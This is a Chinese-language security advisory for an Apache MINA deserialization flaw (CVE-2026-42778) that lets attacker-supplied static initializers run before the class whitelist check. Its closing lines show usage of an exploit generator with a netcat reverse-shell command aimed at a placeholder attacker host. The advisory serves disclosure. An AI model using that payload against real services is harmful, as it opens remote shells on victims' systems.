
CVE-2026-42778 EUVD-2026-26492 不可信数据反序列化(CWE-502)
Apache MINA 的 AbstractIoBuffer.getObject() 方法修复不完整。用于限制可反序列化类的类名白名单验证应用得太晚,导致在读取类时,静态初始化器可能已经执行。这是因为针对 CVE-2024-52046 的原始修复未正确应用到 2.1.X 和 2.2.X 分支。受影响版本:- Apache MINA 2.1.0 至 2.1.11 - Apache MINA 2.2.0 至 2.2.6
CVE ID:CVE-2026-42778
发布时间:2026年1月5日
影响:严重
漏洞利用可用性:非公开,仅限私有。
CVSS:9.8
补丁可用性:(尚无官方补丁)
攻击者可以构造恶意序列化对象,当这些对象被 IoBuffer.getObject() 处理时,会在类名白名单验证发生之前通过静态初始化器执行任意代码。由于这是一个无需权限或用户交互即可通过网络访问的漏洞,任何使用 Apache MINA 并调用 IoBuffer.getObject() 方法的应用程序都可能遭受远程代码执行。该漏洞可导致受影响系统的机密性、完整性和可用性完全受损。
# 编译并生成
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# 通过网络发送到使用 ObjectSerializationCodecFactory 的基于 MINA 的服务
# 或任何调用 IoBuffer.getObject() 的端点